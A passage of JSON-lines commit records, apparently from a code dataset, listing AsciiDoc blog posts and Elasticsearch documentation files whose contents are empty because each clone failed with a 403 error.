'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2e93d28707521667a4fd9dd9cea2e73fa604c8e","subject":"Be explicit about the fact backslashes need to be escaped. (#22257)","message":"Be explicit about the fact backslashes need to be escaped. (#22257)\n\nRelates #22255","repos":"geidies\/elasticsearch,scottsom\/elasticsearch,fernandozhu\/elasticsearch,umeshdangat\/elasticsearch,winstonewert\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,IanvsPoplicola\/elasticsearch,Helen-Zhao\/elasticsearch,MisterAndersen\/elasticsearch,Helen-Zhao\/elasticsearch,JSCooke\/elasticsearch,nezirus\/elasticsearch,GlenRSmith\/elasticsearch,Helen-Zhao\/elasticsearch,kalimatas\/elasticsearch,brandonkearby\/elasticsearch,StefanGor\/elasticsearch,njlawton\/elasticsearch,JackyMai\/elasticsearch,i-am-Nathan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,LewayneNaidoo\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,elasticdog\/elasticsearch,JackyMai\/elasticsearch,C-Bish\/elasticsearch,markwalkom\/elasticsearch,mohit\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,nazarewk\/elasticsearch,obourgain\/elasticsearch,i-am-Nathan\/elasticsearch,artnowo\/elasticsearch,IanvsPoplicola\/elasticsearch,maddin2016\/elasticsearch,ZTE-PaaS\/elasticsearch,lks21c\/elasticsearch,henakamaMSFT\/elasticsearch,wangtuo\/elasticsearch,ZTE-PaaS\/elasticsearch,GlenRSmith\/elasticsearch,IanvsPoplicola\/elasticsearch,s1monw\/elasticsearch,naveenhooda2000\/elasticsearch,brandonkearby\/elasticsearch,njlawton\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,alexshadow007\/elasticsearch,kalimatas\/elasticsearch,winstonewert\/elasticsearch,mortonsykes\/elasticsearch,Shepard1212\/elasticsearch,brandonkearby\/elasticsearch,bawse\/elasticsearch,StefanGor\/elasticsearch,fred84\/elasticsearch,fernandozhu\/elasticsearch,rlugojr\/elasticsearch,nknize\/elasticsearch,glefloch\/elasticsearch,C-Bish\/elasticsearch,i-am-Nathan\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,rajanm\/elasticsearch,StefanGor\/elasticsearch,a2lin\/elasticsearch,jprante\/elasticsearch,nezirus\/elasticsearch,LewayneNaidoo\/elasticsearch,alexshadow007\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,jprante\/elasticsearch,LeoYao\/elasticsearch,elasticdog\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,wangtuo\/elasticsearch,wenpos\/elasticsearch,Helen-Zhao\/elasticsearch,qwerty4030\/elasticsearch,rajanm\/elasticsearch,nilabhsagar\/elasticsearch,markwalkom\/elasticsearch,naveenhooda2000\/elasticsearch,Shepard1212\/elasticsearch,winstonewert\/elasticsearch,sneivandt\/elasticsearch,uschindler\/elasticsearch,jprante\/elasticsearch,wuranbo\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JSCooke\/elasticsearch,mohit\/elasticsearch,njlawton\/elasticsearch,i-am-Nathan\/elasticsearch,artnowo\/elasticsearch,bawse\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,henakamaMSFT\/elasticsearch,ZTE-PaaS\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,LeoYao\/elasticsearch,alexshadow007\/elasticsearch,gfyoung\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,C-Bish\/elasticsearch,a2lin\/elasticsearch,wenpos\/elasticsearch,gingerwizard
\/elasticsearch,strapdata\/elassandra,Stacey-Gammon\/elasticsearch,MisterAndersen\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,scottsom\/elasticsearch,elasticdog\/elasticsearch,LewayneNaidoo\/elasticsearch,wuranbo\/elasticsearch,Helen-Zhao\/elasticsearch,wangtuo\/elasticsearch,njlawton\/elasticsearch,pozhidaevak\/elasticsearch,StefanGor\/elasticsearch,mjason3\/elasticsearch,JackyMai\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,rlugojr\/elasticsearch,rlugojr\/elasticsearch,mohit\/elasticsearch,mikemccand\/elasticsearch,pozhidaevak\/elasticsearch,mortonsykes\/elasticsearch,nilabhsagar\/elasticsearch,obourgain\/elasticsearch,i-am-Nathan\/elasticsearch,strapdata\/elassandra,rajanm\/elasticsearch,vroyer\/elasticassandra,wuranbo\/elasticsearch,JSCooke\/elasticsearch,naveenhooda2000\/elasticsearch,geidies\/elasticsearch,geidies\/elasticsearch,umeshdangat\/elasticsearch,mjason3\/elasticsearch,fernandozhu\/elasticsearch,strapdata\/elassandra,vroyer\/elassandra,scorpionvicky\/elasticsearch,obourgain\/elasticsearch,gingerwizard\/elasticsearch,fernandozhu\/elasticsearch,jimczi\/elasticsearch,GlenRSmith\/elasticsearch,artnowo\/elasticsearch,fernandozhu\/elasticsearch,vroyer\/elasticassandra,henakamaMSFT\/elasticsearch,naveenhooda2000\/elasticsearch,geidies\/elasticsearch,LeoYao\/elasticsearch,nazarewk\/elasticsearch,maddin2016\/elasticsearch,LewayneNaidoo\/elasticsearch,wuranbo\/elasticsearch,winstonewert\/elasticsearch,jprante\/elasticsearch,umeshdangat\/elasticsearch,geidies\/elasticsearch,masaruh\/elasticsearch,ZTE-PaaS\/elasticsearch,sneivandt\/elasticsearch,mikemccand\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,ZTE-PaaS\/elasticsearch,LeoYao\/elasticsearch,IanvsPoplicola\/elasticsearch,nknize\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,njlawton\/elasticsearch,bawse\/elasticsearch,lks21c\/elasticsearch,nazarewk\/elasticsearch,nezirus\/elasticsearch,rlugojr\/elasticsearch,JackyMai\/elasticsearch,lks21c\/elasticsearch,nezirus\/elasticsearch,shreejay\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,wuranbo\/elasticsearch,LeoYao\/elasticsearch,MisterAndersen\/elasticsearch,mortonsykes\/elasticsearch,Shepard1212\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,nezirus\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,LewayneNaidoo\/elasticsearch,nazarewk\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,a2lin\/elasticsearch,winstonewert\/elasticsearch,strapdata\/elassandra,lks21c\/elasticsearch,shreejay\/elasticsearch,C-Bish\/elasticsearch,coding0011\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,jimczi\/elasticsearch,qwerty4030\/elasticsearch,glefloch\/elasticsearch,henakamaMSFT\/elasticsearch,umeshdangat\/elasticsearch,shreejay\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,artnowo\/elasticsearch,alexshadow007\/elasticsearch,JackyMai\/elasticsearch,vroyer\/elassandra,nilabhsagar\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,Shepard1212\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,Shepard1212\/elasticsearch,fred84\/elasticsearch,StefanGor\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,henakamaMSFT\/elasticsearch,mortonsykes\/elasticsearc
h,rajanm\/elasticsearch,kalimatas\/elasticsearch,bawse\/elasticsearch,bawse\/elasticsearch,mikemccand\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,MisterAndersen\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,a2lin\/elasticsearch,nilabhsagar\/elasticsearch,obourgain\/elasticsearch,HonzaKral\/elasticsearch,masaruh\/elasticsearch,pozhidaevak\/elasticsearch,pozhidaevak\/elasticsearch,jimczi\/elasticsearch,IanvsPoplicola\/elasticsearch,GlenRSmith\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,MisterAndersen\/elasticsearch,mohit\/elasticsearch,umeshdangat\/elasticsearch,qwerty4030\/elasticsearch,obourgain\/elasticsearch,mikemccand\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,jimczi\/elasticsearch,glefloch\/elasticsearch,elasticdog\/elasticsearch,vroyer\/elasticassandra,nilabhsagar\/elasticsearch,kalimatas\/elasticsearch,artnowo\/elasticsearch,mortonsykes\/elasticsearch,markwalkom\/elasticsearch,naveenhooda2000\/elasticsearch,uschindler\/elasticsearch,Stacey-Gammon\/elasticsearch,geidies\/elasticsearch,maddin2016\/elasticsearch,gfyoung\/elasticsearch,C-Bish\/elasticsearch,LeoYao\/elasticsearch,JSCooke\/elasticsearch,scorpionvicky\/elasticsearch,mohit\/elasticsearch,lks21c\/elasticsearch,brandonkearby\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,jprante\/elasticsearch,sneivandt\/elasticsearch,rlugojr\/elasticsearch,scottsom\/elasticsearch,mikemccand\/elasticsearch,wenpos\/elasticsearch,JSCooke\/elasticsearch,alexshadow007\/elasticsearch,nazarewk\/elasticsearch,a2lin\/elasticsearch,wangtuo\/elasticsearch,sneivandt\/elasticsearch","old_file":"docs\/reference\/query-dsl\/query-string-query.asciidoc","new_file":"docs\/reference\/query-dsl\/query-string-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"df99a8fa5aa751ecc9f8476439c2c56c1859032c","subject":"y2b create post Using Your Wrist To Power Your Smartphone...","message":"y2b create post Using Your Wrist To Power Your Smartphone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-20-UsingYourWristToPowerYourSmartphone.adoc","new_file":"_posts\/2018-01-20-UsingYourWristToPowerYourSmartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b77dc7440ad52d06f4930f0c22b9e43ba725981","subject":"create post Did Apple Just Cancel The iPhone X?","message":"create post Did Apple Just Cancel The iPhone X?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Did-Apple-Just-Cancel-The-iPhone-X?.adoc","new_file":"_posts\/2018-02-26-Did-Apple-Just-Cancel-The-iPhone-X?.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6bc25ad98dca4971834f224cdcc870d95915a66","subject":"Update 
2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"248612daf89346e4b8885f49b97abc9b24e600d3","subject":"Update 2017-06-22-Your-Java-EE-App-on-Kubernetes.adoc","message":"Update 2017-06-22-Your-Java-EE-App-on-Kubernetes.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2017-06-22-Your-Java-EE-App-on-Kubernetes.adoc","new_file":"_posts\/2017-06-22-Your-Java-EE-App-on-Kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/pdudits.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c05749c333d0b3b53b6b8fb0ae880614d7ad5aeb","subject":"docu, github release","message":"docu, github release\n","repos":"moley\/leguan,moley\/leguan,moley\/leguan,moley\/leguan,moley\/leguan","old_file":"leguan-server\/src\/main\/docs\/serverInstall.adoc","new_file":"leguan-server\/src\/main\/docs\/serverInstall.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moley\/leguan.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e3f59597a1afa1fca13004498e728b66b2eb3eb","subject":"Fix title again","message":"Fix title again\n","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2013-10-13-Neo4j-mais-quest-ce-que-cest.adoc","new_file":"_posts\/2013-10-13-Neo4j-mais-quest-ce-que-cest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0ada5b1033828dea9a6f186efc30e119b209186d","subject":"Update 2017-06-29-When-and-How-aspnet-runtime-loads-a-particular-dll.adoc","message":"Update 2017-06-29-When-and-How-aspnet-runtime-loads-a-particular-dll.adoc","repos":"rohithkrajan\/rohithkrajan.github.io,rohithkrajan\/rohithkrajan.github.io,rohithkrajan\/rohithkrajan.github.io,rohithkrajan\/rohithkrajan.github.io","old_file":"_posts\/2017-06-29-When-and-How-aspnet-runtime-loads-a-particular-dll.adoc","new_file":"_posts\/2017-06-29-When-and-How-aspnet-runtime-loads-a-particular-dll.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rohithkrajan\/rohithkrajan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1afffb3efb0378e54d037f94cd0603fb20961d6f","subject":"Update 2017-07-22-My-test-post-using-hubpages.adoc","message":"Update 
2017-07-22-My-test-post-using-hubpages.adoc","repos":"itsnarsi\/itsnarsi.github.io,itsnarsi\/itsnarsi.github.io,itsnarsi\/itsnarsi.github.io,itsnarsi\/itsnarsi.github.io","old_file":"_posts\/2017-07-22-My-test-post-using-hubpages.adoc","new_file":"_posts\/2017-07-22-My-test-post-using-hubpages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/itsnarsi\/itsnarsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5dfa4aaa87dacce7ca25ad0909743239799953df","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b10820643bfc907b3aca2535656effac870df09","subject":"Update 2017-06-21-Dinosaurs-Make-Better-Lovers.adoc","message":"Update 2017-06-21-Dinosaurs-Make-Better-Lovers.adoc","repos":"polarbill\/polarbill.github.io,polarbill\/polarbill.github.io,polarbill\/polarbill.github.io,polarbill\/polarbill.github.io","old_file":"_posts\/2017-06-21-Dinosaurs-Make-Better-Lovers.adoc","new_file":"_posts\/2017-06-21-Dinosaurs-Make-Better-Lovers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/polarbill\/polarbill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f9ff8b7fd941ab34ffc98d6702cbff8f77e5a65","subject":"y2b create post Did Apple Just Cancel The iPhone X?","message":"y2b create post Did Apple Just Cancel The iPhone X?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-24-DidAppleJustCancelTheiPhoneX.adoc","new_file":"_posts\/2018-01-24-DidAppleJustCancelTheiPhoneX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95c27dd7ea02ab24a9f85c1d0379069746a5ab17","subject":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","message":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"435b7eed0399a1f929f60fc4e60ed5f0b76f0c74","subject":"Start manual conversion to AsciiDoc.","message":"Start manual conversion to 
AsciiDoc.\n","repos":"jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics,jenetics\/jenetics","old_file":"org.jenetics.doc\/src\/main\/asciidoc\/manual.adoc","new_file":"org.jenetics.doc\/src\/main\/asciidoc\/manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenetics\/jenetics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0f0b69902cadf74bb8db0ed1777afc5ef58aa517","subject":"Some symbols","message":"Some symbols","repos":"ufpb-computacao\/asciidoc-book-template-with-rake-and-github,ufpb-computacao\/asciidoc-book-template-with-rake-and-github","old_file":"livro\/capitulos\/symbols.adoc","new_file":"livro\/capitulos\/symbols.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ufpb-computacao\/asciidoc-book-template-with-rake-and-github.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73b60c18246de48e235bd9cef7929608fd07995b","subject":"Update 2017-03-21-Pattern-Decorator-en-Java-8.adoc","message":"Update 2017-03-21-Pattern-Decorator-en-Java-8.adoc","repos":"tosun-si\/tosun-si.github.io,tosun-si\/tosun-si.github.io,tosun-si\/tosun-si.github.io,tosun-si\/tosun-si.github.io","old_file":"_posts\/2017-03-21-Pattern-Decorator-en-Java-8.adoc","new_file":"_posts\/2017-03-21-Pattern-Decorator-en-Java-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tosun-si\/tosun-si.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa20786cd7adbd7a517a7ee52ed6589ecd939861","subject":"Added skeleton Operations documentation (#1446)","message":"Added skeleton Operations documentation (#1446)\n\n","repos":"EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design_docs\/operations\/resources.adoc","new_file":"documentation\/design_docs\/operations\/resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7f930eaadc0414785e0e000a95be7cf3449424d7","subject":"Update 2016-08-05-RethinkDB-Walkthrough.adoc","message":"Update 2016-08-05-RethinkDB-Walkthrough.adoc","repos":"vs4vijay\/vs4vijay.github.io,vs4vijay\/vs4vijay.github.io,vs4vijay\/vs4vijay.github.io,vs4vijay\/vs4vijay.github.io","old_file":"_posts\/2016-08-05-RethinkDB-Walkthrough.adoc","new_file":"_posts\/2016-08-05-RethinkDB-Walkthrough.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vs4vijay\/vs4vijay.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ed77e878b716edc0ca72b7bab574eedc1bb103c","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 
2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82bed6ee30b4f521b0a5d2ff44a081bcacf52bcf","subject":"0.9.5 release post","message":"0.9.5 release post\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-05-06-debezium-0-9-5-final-released.adoc","new_file":"blog\/2019-05-06-debezium-0-9-5-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0cf9c7beade398c5172e73049e7c1e6ff80fbaf5","subject":"Update 2016-04-12-A-JDBC-Gateway-Microservice.adoc","message":"Update 2016-04-12-A-JDBC-Gateway-Microservice.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-04-12-A-JDBC-Gateway-Microservice.adoc","new_file":"_posts\/2016-04-12-A-JDBC-Gateway-Microservice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85ae9196290870604d92dd7c219611bd1eb119bf","subject":"Update 2017-03-08-Episode-91-Chalk-up-Lion-Man.adoc","message":"Update 2017-03-08-Episode-91-Chalk-up-Lion-Man.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-03-08-Episode-91-Chalk-up-Lion-Man.adoc","new_file":"_posts\/2017-03-08-Episode-91-Chalk-up-Lion-Man.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2addaf87d19892b7da8b395e848c2fcf677d9731","subject":"Update 2016-12-01-Generic-JWT-policy-for-apiman.adoc","message":"Update 2016-12-01-Generic-JWT-policy-for-apiman.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2016-12-01-Generic-JWT-policy-for-apiman.adoc","new_file":"_posts\/2016-12-01-Generic-JWT-policy-for-apiman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"949bc1ee79653b0ea3282b405c119cf4637bb1ee","subject":"Update 2018-03-15-try-ecr.adoc","message":"Update 
2018-03-15-try-ecr.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-15-try-ecr.adoc","new_file":"_posts\/2018-03-15-try-ecr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78d21595923f947ce2f94a6c2992d2321960c545","subject":"Update 2018-03-15-try-ecr.adoc","message":"Update 2018-03-15-try-ecr.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-15-try-ecr.adoc","new_file":"_posts\/2018-03-15-try-ecr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdce0172c7ea0362f04868ccab53c8c1ba110086","subject":"Update 2019-01-19-Vuejs-4.adoc","message":"Update 2019-01-19-Vuejs-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1201843d723b297785d17be9325a4b94e31a9503","subject":"Update java.asciidoc","message":"Update java.asciidoc\n\nAdd few more breaking changes.\n\nCloses 
#14696\n","repos":"fforbeck\/elasticsearch,gfyoung\/elasticsearch,girirajsharma\/elasticsearch,fernandozhu\/elasticsearch,njlawton\/elasticsearch,jpountz\/elasticsearch,gmarz\/elasticsearch,xuzha\/elasticsearch,HonzaKral\/elasticsearch,JackyMai\/elasticsearch,jpountz\/elasticsearch,Stacey-Gammon\/elasticsearch,JervyShi\/elasticsearch,andrejserafim\/elasticsearch,gingerwizard\/elasticsearch,pozhidaevak\/elasticsearch,StefanGor\/elasticsearch,rmuir\/elasticsearch,F0lha\/elasticsearch,GlenRSmith\/elasticsearch,mikemccand\/elasticsearch,snikch\/elasticsearch,geidies\/elasticsearch,mapr\/elasticsearch,ESamir\/elasticsearch,wenpos\/elasticsearch,AndreKR\/elasticsearch,artnowo\/elasticsearch,yynil\/elasticsearch,rlugojr\/elasticsearch,avikurapati\/elasticsearch,obourgain\/elasticsearch,myelin\/elasticsearch,wuranbo\/elasticsearch,girirajsharma\/elasticsearch,myelin\/elasticsearch,xuzha\/elasticsearch,polyfractal\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,masaruh\/elasticsearch,alexshadow007\/elasticsearch,sneivandt\/elasticsearch,mmaracic\/elasticsearch,strapdata\/elassandra5-rc,tebriel\/elasticsearch,JervyShi\/elasticsearch,kalimatas\/elasticsearch,fforbeck\/elasticsearch,cwurm\/elasticsearch,fernandozhu\/elasticsearch,ricardocerq\/elasticsearch,maddin2016\/elasticsearch,mapr\/elasticsearch,mortonsykes\/elasticsearch,ivansun1010\/elasticsearch,sreeramjayan\/elasticsearch,sreeramjayan\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,davidvgalbraith\/elasticsearch,ZTE-PaaS\/elasticsearch,jbertouch\/elasticsearch,wenpos\/elasticsearch,snikch\/elasticsearch,zkidkid\/elasticsearch,AndreKR\/elasticsearch,rhoml\/elasticsearch,scorpionvicky\/elasticsearch,jbertouch\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,dongjoon-hyun\/elasticsearch,Stacey-Gammon\/elasticsearch,geidies\/elasticsearch,rlugojr\/elasticsearch,i-am-Nathan\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,nknize\/elasticsearch,tebriel\/elasticsearch,mohit\/elasticsearch,nilabhsagar\/elasticsearch,JackyMai\/elasticsearch,brandonkearby\/elasticsearch,tebriel\/elasticsearch,cwurm\/elasticsearch,awislowski\/elasticsearch,kaneshin\/elasticsearch,LeoYao\/elasticsearch,rajanm\/elasticse